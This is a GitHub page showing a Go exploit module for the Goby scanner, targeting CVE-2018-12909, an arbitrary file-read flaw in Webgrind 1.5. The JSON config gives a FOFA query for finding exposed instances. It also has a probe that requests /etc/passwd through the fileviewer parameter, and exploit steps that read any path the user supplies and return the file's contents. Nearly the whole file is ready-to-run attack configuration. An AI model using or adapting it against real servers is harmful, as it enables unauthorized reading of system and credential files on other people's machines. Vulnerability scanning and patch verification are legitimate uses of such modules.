-
Notifications
You must be signed in to change notification settings - Fork 197
/
Webgrind_File_read_cve_2018_12909.go
162 lines (159 loc) · 4.79 KB
/
Webgrind_File_read_cve_2018_12909.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
func init() {
expJson := `{
"Name": "Webgrind_File_read_cve-2018-12909",
"Description": "<p>Webgrind是一套PHP执行时间分析工具。</p><p>Webgrind 1.5版本中存在安全漏洞,该漏洞源于程序依靠用户输入来显示文件。攻击者可借助index.php?op=fileviewer&file= URI利用该漏洞查看可被Webserver用户访问的本地文件系统上的文件。</p>",
"Product": "",
"Homepage": "https://github.com/jokkedk/webgrind",
"DisclosureDate": "2022-06-24",
"Author": "",
"FofaQuery": "app=\"Webgrind\"",
"GobyQuery": "app=\"Webgrind\"",
"Level": "2",
"Impact": "<p>Webgrind是一套PHP执行时间分析工具。</p><p>Webgrind 1.5版本中存在安全漏洞,该漏洞源于程序依靠用户输入来显示文件。攻击者可借助index.php?op=fileviewer&file= URI利用该漏洞查看可被Webserver用户访问的本地文件系统上的文件。</p>",
"Recommendation": "<p>目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:</p><p><a target=\"_Blank\" href=\"https://github.com/jokkedk/webgrind\">https://github.com/jokkedk/webgrind</a></p>",
"References": [
"https://github.com/jokkedk/webgrind/issues/112"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "path",
"type": "input",
"value": "/etc/passwd",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/index.php?op=fileviewer&file=/etc/passwd",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "regex",
"value": "root:[x*]?:0:0:",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/index.php?op=fileviewer&file={{{path}}}",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "regex",
"value": "root:[x*]?:0:0:",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"Tags": [
"任意⽂件下载"
],
"VulType": [
"任意⽂件下载"
],
"CVEIDs": [
" CVE-2018-12909"
],
"CNNVD": [
"CNNVD-201806-1367"
],
"CNVD": [
""
],
"CVSSScore": "",
"Translation": {
"CN": {
"Name": "Webgrind_File_read_cve-2018-12909",
"Product": "",
"Description": "<p>Webgrind是一套PHP执行时间分析工具。</p><p>Webgrind 1.5版本中存在安全漏洞,该漏洞源于程序依靠用户输入来显示文件。攻击者可借助index.php?op=fileviewer&file= URI利用该漏洞查看可被Webserver用户访问的本地文件系统上的文件。</p>",
"Recommendation": "<p>目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:</p><p><a target=\"_Blank\" href=\"https://github.com/jokkedk/webgrind\">https://github.com/jokkedk/webgrind</a></p>",
"Impact": "<p>Webgrind是一套PHP执行时间分析工具。</p><p>Webgrind 1.5版本中存在安全漏洞,该漏洞源于程序依靠用户输入来显示文件。攻击者可借助index.php?op=fileviewer&file= URI利用该漏洞查看可被Webserver用户访问的本地文件系统上的文件。</p>",
"VulType": [
"任意⽂件下载"
],
"Tags": [
"任意⽂件下载"
]
},
"EN": {
"Name": "Webgrind_File_read_cve-2018-12909",
"Product": "",
"Description": "",
"Recommendation": "",
"Impact": "",
"VulType": [],
"Tags": []
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}